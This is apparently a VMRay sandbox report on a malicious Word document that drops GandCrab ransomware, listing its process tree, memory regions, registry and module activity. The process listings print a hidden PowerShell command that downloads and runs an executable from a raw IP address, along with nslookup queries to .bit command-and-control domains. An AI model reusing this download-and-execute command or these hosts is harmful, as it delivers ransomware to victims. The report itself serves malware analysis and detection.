Doc Dropper - Gandcrab Analysis | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Target: Windows 10 (64-bit), MS Office 2016 | ms_office
Classification: Dropper, Trojan, Downloader, Ransomware

99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809 (SHA256)

sample_file.doc

Word Document

Created at 2018-04-20 18:19:00

Notifications (2/3)

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The overall sleep time of all monitored processes was truncated from "1 minute, 10 seconds" to "1 minute, 10 seconds" to reveal dormant functionality.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x1230 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -
#2 0x11a0 Child Process Medium powershell.exe powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe'); #1
#4 0x5e0 Child Process Medium powershell.exe "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe #2
#6 0xc0c Child Process Medium phfw.exe "C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe" #4
#7 0xdec Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #6
#9 0x10f4 Child Process Medium nslookup.exe nslookup ransomware.bit ns2.corp-servers.ru #6
#11 0x1064 Autostart Medium ibpbzu.exe "C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe" -
#12 0x1128 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#14 0x1220 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#16 0x124c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#18 0x135c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#20 0x1068 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#22 0x1100 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#24 0x1120 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#26 0x113c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#28 0xe0c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#31 0x3a4 Child Process High (Elevated) wmic.exe "C:\WINDOWS\SysWOW64\wbem\wmic.exe" process call create "cmd /c start C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe" #11
#33 0x150 RPC Server System (Elevated) svchost.exe C:\WINDOWS\system32\svchost.exe -k netsvcs #31
#34 0x674 RPC Server System (Elevated) wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding #33
#35 0xf0 Child Process High (Elevated) cmd.exe cmd /c start C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe #34
#37 0x608 Child Process High (Elevated) ibpbzu.exe C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe #35

Behavior Information - Grouped by Category

Process #1: winword.exe
178 0
»
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\FD1HVy\Desktop\
Monitor Start Time: 00:00:19, Reason: Analysis Target
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:05:27
OS Process Information
»
Information Value
PID 0x1230
Parent PID 0x9f4 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 13D4
0x 13D0
0x 13CC
0x 13C8
0x 13C4
0x 13C0
0x 13BC
0x 1390
0x 1344
0x 131C
0x 12EC
0x 12E8
0x 12E4
0x 12D0
0x 12CC
0x 12C8
0x 12C4
0x 12C0
0x 12BC
0x 12B8
0x 12B0
0x 12A4
0x 1234
0x 13D8
0x 116C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable False False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable False False False -
private_0x0000004072200000 0x4072200000 0x40723fffff Private Memory Readable, Writable False False False -
private_0x0000004072400000 0x4072400000 0x40724fffff Private Memory Readable, Writable False False False -
private_0x0000004072600000 0x4072600000 0x40726fffff Private Memory Readable, Writable False False False -
private_0x0000004072700000 0x4072700000 0x40727fffff Private Memory Readable, Writable False False False -
private_0x0000004072800000 0x4072800000 0x40728fffff Private Memory Readable, Writable False False False -
private_0x0000004072900000 0x4072900000 0x40729fffff Private Memory Readable, Writable False False False -
private_0x0000004072a00000 0x4072a00000 0x4072afffff Private Memory Readable, Writable False False False -
private_0x0000004072b00000 0x4072b00000 0x4072bfffff Private Memory Readable, Writable False False False -
private_0x0000004072c00000 0x4072c00000 0x4072cfffff Private Memory Readable, Writable False False False -
private_0x0000004072d00000 0x4072d00000 0x4072dfffff Private Memory Readable, Writable False False False -
private_0x0000004072e00000 0x4072e00000 0x4072efffff Private Memory Readable, Writable False False False -
private_0x0000004072f00000 0x4072f00000 0x4072ffffff Private Memory Readable, Writable False False False -
private_0x0000004073000000 0x4073000000 0x40730fffff Private Memory Readable, Writable False False False -
private_0x0000004073100000 0x4073100000 0x40731fffff Private Memory Readable, Writable False False False -
private_0x0000004073200000 0x4073200000 0x40732fffff Private Memory Readable, Writable False False False -
private_0x0000004073300000 0x4073300000 0x40733fffff Private Memory Readable, Writable False False False -
private_0x0000004073400000 0x4073400000 0x40734fffff Private Memory Readable, Writable False False False -
private_0x0000004073500000 0x4073500000 0x40735fffff Private Memory Readable, Writable False False False -
private_0x0000004073600000 0x4073600000 0x40736fffff Private Memory Readable, Writable False False False -
private_0x0000004073700000 0x4073700000 0x40737fffff Private Memory Readable, Writable False False False -
private_0x0000004073800000 0x4073800000 0x40738fffff Private Memory Readable, Writable False False False -
private_0x0000004073900000 0x4073900000 0x40739fffff Private Memory Readable, Writable False False False -
private_0x0000004073a00000 0x4073a00000 0x4073afffff Private Memory Readable, Writable False False False -
private_0x0000004073b00000 0x4073b00000 0x4073bfffff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb09f0000 0x21fb09f0000 0x21fb09fffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000021fb0a00000 0x21fb0a00000 0x21fb0a00fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb0a10000 0x21fb0a10000 0x21fb0a27fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb0a30000 0x21fb0a30000 0x21fb0a33fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb0a40000 0x21fb0a40000 0x21fb0a43fff Pagefile Backed Memory Readable False False False -
private_0x0000021fb0a50000 0x21fb0a50000 0x21fb0a50fff Private Memory Readable, Writable False False False -
private_0x0000021fb0a60000 0x21fb0a60000 0x21fb0a66fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb0a70000 0x21fb0a70000 0x21fb0a70fff Pagefile Backed Memory Readable False False False -
private_0x0000021fb0a80000 0x21fb0a80000 0x21fb0a8ffff Private Memory Readable, Writable False False False -
private_0x0000021fb0a90000 0x21fb0a90000 0x21fb0a96fff Private Memory Readable, Writable False False False -
private_0x0000021fb0aa0000 0x21fb0aa0000 0x21fb0aa0fff Private Memory Readable, Writable False False False -
private_0x0000021fb0ab0000 0x21fb0ab0000 0x21fb0ab0fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb0ac0000 0x21fb0ac0000 0x21fb0ac0fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb0ad0000 0x21fb0ad0000 0x21fb0bcffff Private Memory Readable, Writable False False False -
locale.nls 0x21fb0bd0000 0x21fb0c94fff Memory Mapped File Readable False False False -
pagefile_0x0000021fb0ca0000 0x21fb0ca0000 0x21fb0ea7fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb0eb0000 0x21fb0eb0000 0x21fb1030fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb1040000 0x21fb1040000 0x21fb243ffff Pagefile Backed Memory Readable False False False -
sortdefault.nls 0x21fb2440000 0x21fb2776fff Memory Mapped File Readable False False False -
private_0x0000021fb2780000 0x21fb2780000 0x21fb287ffff Private Memory Readable, Writable False False False -
private_0x0000021fb2880000 0x21fb2880000 0x21fb2880fff Private Memory Readable, Writable False False False -
private_0x0000021fb2890000 0x21fb2890000 0x21fb2890fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb28a0000 0x21fb28a0000 0x21fb28a1fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb28b0000 0x21fb28b0000 0x21fb28b1fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb28c0000 0x21fb28c0000 0x21fb28c1fff Pagefile Backed Memory Readable False False False -
private_0x0000021fb28d0000 0x21fb28d0000 0x21fb28dffff Private Memory - False False False -
pagefile_0x0000021fb28e0000 0x21fb28e0000 0x21fb28e1fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb28f0000 0x21fb28f0000 0x21fb28f1fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb2900000 0x21fb2900000 0x21fb2901fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb2910000 0x21fb2910000 0x21fb2911fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb2920000 0x21fb2920000 0x21fb2921fff Pagefile Backed Memory Readable False False False -
winnlsres.dll 0x21fb2930000 0x21fb2934fff Memory Mapped File Readable False False False -
pagefile_0x0000021fb2940000 0x21fb2940000 0x21fb2941fff Pagefile Backed Memory Readable False False False -
wwintl.dll 0x21fb2950000 0x21fb2a0bfff Memory Mapped File Readable False False False -
pagefile_0x0000021fb2a10000 0x21fb2a10000 0x21fb2a11fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb2a20000 0x21fb2a20000 0x21fb2a20fff Pagefile Backed Memory Readable, Writable False False False -
winnlsres.dll.mui 0x21fb2a30000 0x21fb2a3ffff Memory Mapped File Readable False False False -
msointl30.dll 0x21fb2a40000 0x21fb2a4efff Memory Mapped File Readable False False False -
pagefile_0x0000021fb2a50000 0x21fb2a50000 0x21fb2a50fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb2a60000 0x21fb2a60000 0x21fb2a66fff Private Memory Readable, Writable False False False -
private_0x0000021fb2a70000 0x21fb2a70000 0x21fb2a77fff Private Memory Readable, Writable False False False -
private_0x0000021fb2a80000 0x21fb2a80000 0x21fb2a80fff Private Memory Readable, Writable False False False -
private_0x0000021fb2a90000 0x21fb2a90000 0x21fb2a90fff Private Memory Readable, Writable False False False -
private_0x0000021fb2aa0000 0x21fb2aa0000 0x21fb2aa0fff Private Memory Readable, Writable False False False -
private_0x0000021fb2ab0000 0x21fb2ab0000 0x21fb2ab0fff Private Memory Readable, Writable False False False -
private_0x0000021fb2ac0000 0x21fb2ac0000 0x21fb2ae7fff Private Memory Readable, Writable False False False -
private_0x0000021fb2af0000 0x21fb2af0000 0x21fb2af0fff Private Memory Readable, Writable False False False -
private_0x0000021fb2b00000 0x21fb2b00000 0x21fb2b1ffff Private Memory Readable, Writable False False False -
office.odf 0x21fb2b20000 0x21fb2cd8fff Memory Mapped File Readable False False False -
msointl.dll 0x21fb2ce0000 0x21fb2e5afff Memory Mapped File Readable False False False -
pagefile_0x0000021fb2e60000 0x21fb2e60000 0x21fb2e9bfff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb2ea0000 0x21fb2ea0000 0x21fb2ea0fff Private Memory Readable, Writable False False False -
private_0x0000021fb2eb0000 0x21fb2eb0000 0x21fb2ebffff Private Memory Readable, Writable False False False -
mso40uires.dll 0x21fb2ec0000 0x21fb31c7fff Memory Mapped File Readable False False False -
mso99lres.dll 0x21fb31d0000 0x21fb3af0fff Memory Mapped File Readable False False False -
msores.dll 0x21fb3b00000 0x21fb893efff Memory Mapped File Readable False False False -
pagefile_0x0000021fb8940000 0x21fb8940000 0x21fb89aafff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb89b0000 0x21fb89b0000 0x21fb8a1afff Private Memory Readable, Writable False False False -
private_0x0000021fb8a20000 0x21fb8a20000 0x21fb8c1ffff Private Memory Readable, Writable False False False -
private_0x0000021fb8c20000 0x21fb8c20000 0x21fb8c20fff Private Memory Readable, Writable False False False -
private_0x0000021fb8c30000 0x21fb8c30000 0x21fb8c30fff Private Memory Readable, Writable False False False -
~fontcache-system.dat 0x21fb8c40000 0x21fb8cb3fff Memory Mapped File Readable False False False -
private_0x0000021fb8cc0000 0x21fb8cc0000 0x21fb8dbffff Private Memory Readable, Writable False False False -
~fontcache-s-1-5-21-1051304884-625712362-2192934891-1000.dat 0x21fb8dc0000 0x21fb95bffff Memory Mapped File Readable False False False -
private_0x0000021fb95c0000 0x21fb95c0000 0x21fb99bffff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb99c0000 0x21fb99c0000 0x21fb9a72fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb9a80000 0x21fb9a80000 0x21fb9a83fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb9a90000 0x21fb9a90000 0x21fb9f81fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb9f90000 0x21fb9f90000 0x21fb9f90fff Private Memory Readable, Writable False False False -
private_0x0000021fb9fa0000 0x21fb9fa0000 0x21fb9fa0fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb9fb0000 0x21fb9fb0000 0x21fb9fb0fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb9fc0000 0x21fb9fc0000 0x21fb9fc0fff Private Memory Readable, Writable False False False -
private_0x0000021fb9fd0000 0x21fb9fd0000 0x21fb9fd6fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb9fe0000 0x21fb9fe0000 0x21fb9fe4fff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000021fb9ff0000 0x21fb9ff0000 0x21fb9ff0fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fba000000 0x21fba000000 0x21fba000fff Pagefile Backed Memory Readable False False False -
private_0x0000021fba010000 0x21fba010000 0x21fba01ffff Private Memory Readable, Writable False False False -
r00000000000d.clb 0x21fba020000 0x21fba025fff Memory Mapped File Readable False False False -
private_0x0000021fba030000 0x21fba030000 0x21fba03ffff Private Memory - False False False -
user32.dll.mui 0x21fba040000 0x21fba044fff Memory Mapped File Readable False False False -
private_0x0000021fba050000 0x21fba050000 0x21fba050fff Private Memory Readable, Writable False False False -
msxml6r.dll 0x21fba060000 0x21fba060fff Memory Mapped File Readable False False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db 0x21fba070000 0x21fba08dfff Memory Mapped File Readable False False False -
private_0x0000021fba090000 0x21fba090000 0x21fba09ffff Private Memory Readable, Writable False False False -
pagefile_0x0000021fba0a0000 0x21fba0a0000 0x21fba89ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fba8a0000 0x21fba8a0000 0x21fba9d1fff Private Memory Readable, Writable False False False -
private_0x0000021fba9e0000 0x21fba9e0000 0x21fbaddffff Private Memory Readable, Writable False False False -
private_0x0000021fbade0000 0x21fbade0000 0x21fbaedffff Private Memory Readable, Writable False False False -
pagefile_0x0000021fbaee0000 0x21fbaee0000 0x21fbaee0fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fbaef0000 0x21fbaef0000 0x21fbaef6fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fbaf00000 0x21fbaf00000 0x21fbaf01fff Pagefile Backed Memory Readable False False False -
private_0x0000021fbaf10000 0x21fbaf10000 0x21fbaf10fff Private Memory Readable, Writable False False False -
c_1255.nls 0x21fbaf20000 0x21fbaf30fff Memory Mapped File Readable False False False -
private_0x0000021fbaf40000 0x21fbaf40000 0x21fbaf4ffff Private Memory Readable, Writable False False False -
pagefile_0x0000021fbaf50000 0x21fbaf50000 0x21fbb34ffff Pagefile Backed Memory Readable False False False -
private_0x0000021fbb350000 0x21fbb350000 0x21fbb44ffff Private Memory Readable, Writable False False False -
~fontcache-fontface.dat 0x21fbb450000 0x21fbc44ffff Memory Mapped File Readable False False False -
segoeui.ttf 0x21fbc450000 0x21fbc532fff Memory Mapped File Readable False False False -
d2d1.dll.mui 0x21fbc540000 0x21fbc583fff Memory Mapped File Readable False False False -
private_0x0000021fbc590000 0x21fbc590000 0x21fbcd8ffff Private Memory Readable, Writable False False False -
segoeuil.ttf 0x21fbcd90000 0x21fbce66fff Memory Mapped File Readable False False False -
seguisb.ttf 0x21fbce70000 0x21fbcf55fff Memory Mapped File Readable False False False -
segoeuib.ttf 0x21fbcf60000 0x21fbd03ffff Memory Mapped File Readable False False False -
pagefile_0x0000021fbd040000 0x21fbd040000 0x21fbd04ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000021fbd050000 0x21fbd050000 0x21fbd05ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000021fbd060000 0x21fbd060000 0x21fbd06ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fbd070000 0x21fbd070000 0x21fbd47cfff Private Memory Readable, Writable False False False -
private_0x0000021fbd480000 0x21fbd480000 0x21fbd88efff Private Memory Readable, Writable False False False -
private_0x0000021fbd890000 0x21fbd890000 0x21fbdc9dfff Private Memory Readable, Writable False False False -
private_0x0000021fbdca0000 0x21fbdca0000 0x21fbdd1ffff Private Memory Readable, Writable False False False -
private_0x0000021fbdd20000 0x21fbdd20000 0x21fbdf1ffff Private Memory Readable, Writable False False False -
staticcache.dat 0x21fbdf20000 0x21fbf05ffff Memory Mapped File Readable False False False -
pagefile_0x0000021fbf060000 0x21fbf060000 0x21fbf062fff Pagefile Backed Memory Readable False False False -
cversions.2.db 0x21fbf070000 0x21fbf073fff Memory Mapped File Readable False False False -
cversions.2.db 0x21fbf080000 0x21fbf083fff Memory Mapped File Readable False False False -
private_0x0000021fbf090000 0x21fbf090000 0x21fbf0aefff Private Memory Readable, Writable False False False -
pagefile_0x0000021fbf0b0000 0x21fbf0b0000 0x21fbf56cfff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000021fbf570000 0x21fbf570000 0x21fbfa2cfff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fbfa30000 0x21fbfa30000 0x21fc09fffff Private Memory Readable, Writable False False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000017.db 0x21fc0a00000 0x21fc0a46fff Memory Mapped File Readable False False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x21fc0a50000 0x21fc0ae1fff Memory Mapped File Readable False False False -
pagefile_0x0000021fc0af0000 0x21fc0af0000 0x21fc0af2fff Pagefile Backed Memory Readable False False False -
private_0x0000021fc0b30000 0x21fc0b30000 0x21fc0b38fff Private Memory Readable, Writable False False False -
private_0x0000021fc0b40000 0x21fc0b40000 0x21fc0b63fff Private Memory Readable, Writable False False False -
For performance reasons, the remaining 328 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
Registry (48)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Licenses - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 - False 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 - False 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Read Value HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 data = } False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = RequireDeclaration, data = 195, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 2
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 data = C:\Windows\System32\stdole2.tlb True 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe'); os_pid = 0x11a0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (108)
»
Operation Module Additional Information Success Count Logfile
Load Comctl32.dll base_address = 0x7ff9d2a40000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x7ff9b0150000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL base_address = 0x21fba9b0000 True 1
Fn
Load OLEAUT32.DLL base_address = 0x7ff9db420000 True 1
Fn
Load VBE7.DLL base_address = 0x7ff9b03e0000 True 13
Fn
Get Handle Unknown module name base_address = 0x7ff665300000 True 1
Fn
Get Handle Unknown module name base_address = 0x7ff9ce360000 True 1
Fn
Get Handle C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x0 False 1
Fn
Get Handle USER32 base_address = 0x7ff9ddc60000 True 1
Fn
Get Handle oleaut32.dll base_address = 0x7ff9db420000 True 1
Fn
Get Handle ole32.dll base_address = 0x7ff9dd150000 True 1
Fn
Get Filename - process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 2
Fn
Get Address Unknown module name function = MsiProvideQualifiedComponentA, address_out = 0x7ff9ce4265b0 True 1
Fn
Get Address Unknown module name function = MsiGetProductCodeA, address_out = 0x7ff9ce41c070 True 1
Fn
Get Address Unknown module name function = MsiReinstallFeatureA, address_out = 0x7ff9ce428a00 True 1
Fn
Get Address Unknown module name function = MsiProvideComponentA, address_out = 0x7ff9ce425a10 True 1
Fn
Get Address Unknown module name function = GetSystemMetrics, address_out = 0x7ff9ddc6f150 True 1
Fn
Get Address Unknown module name function = MonitorFromWindow, address_out = 0x7ff9ddc68a40 True 1
Fn
Get Address Unknown module name function = MonitorFromRect, address_out = 0x7ff9ddc67990 True 1
Fn
Get Address Unknown module name function = MonitorFromPoint, address_out = 0x7ff9ddc66c10 True 1
Fn
Get Address Unknown module name function = EnumDisplayMonitors, address_out = 0x7ff9ddc939e0 True 1
Fn
Get Address Unknown module name function = GetMonitorInfoA, address_out = 0x7ff9ddc67e90 True 1
Fn
Get Address Unknown module name function = EnumDisplayDevicesA, address_out = 0x7ff9ddc81b50 True 1
Fn
Get Address Unknown module name function = DispCallFunc, address_out = 0x7ff9db428de0 True 1
Fn
Get Address Unknown module name function = LoadTypeLibEx, address_out = 0x7ff9db4303c0 True 1
Fn
Get Address Unknown module name function = UnRegisterTypeLib, address_out = 0x7ff9db454020 True 1
Fn
Get Address Unknown module name function = CreateTypeLib2, address_out = 0x7ff9db43b880 True 1
Fn
Get Address Unknown module name function = VarDateFromUdate, address_out = 0x7ff9db431f50 True 1
Fn
Get Address Unknown module name function = VarUdateFromDate, address_out = 0x7ff9db42f5c0 True 1
Fn
Get Address Unknown module name function = GetAltMonthNames, address_out = 0x7ff9db47bd10 True 1
Fn
Get Address Unknown module name function = VarNumFromParseNum, address_out = 0x7ff9db42efd0 True 1
Fn
Get Address Unknown module name function = VarParseNumFromStr, address_out = 0x7ff9db42df60 True 1
Fn
Get Address Unknown module name function = VarDecFromR4, address_out = 0x7ff9db422190 True 1
Fn
Get Address Unknown module name function = VarDecFromR8, address_out = 0x7ff9db421eb0 True 1
Fn
Get Address Unknown module name function = VarDecFromDate, address_out = 0x7ff9db481f60 True 1
Fn
Get Address Unknown module name function = VarDecFromI4, address_out = 0x7ff9db421b80 True 1
Fn
Get Address Unknown module name function = VarDecFromCy, address_out = 0x7ff9db481f30 True 1
Fn
Get Address Unknown module name function = VarR4FromDec, address_out = 0x7ff9db4823b0 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromTypeInfo, address_out = 0x7ff9db4807c0 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromGuids, address_out = 0x7ff9db480650 True 1
Fn
Get Address Unknown module name function = SafeArrayGetRecordInfo, address_out = 0x7ff9db4819e0 True 1
Fn
Get Address Unknown module name function = SafeArraySetRecordInfo, address_out = 0x7ff9db481a50 True 1
Fn
Get Address Unknown module name function = SafeArrayGetIID, address_out = 0x7ff9db4819b0 True 1
Fn
Get Address Unknown module name function = SafeArraySetIID, address_out = 0x7ff9db423700 True 1
Fn
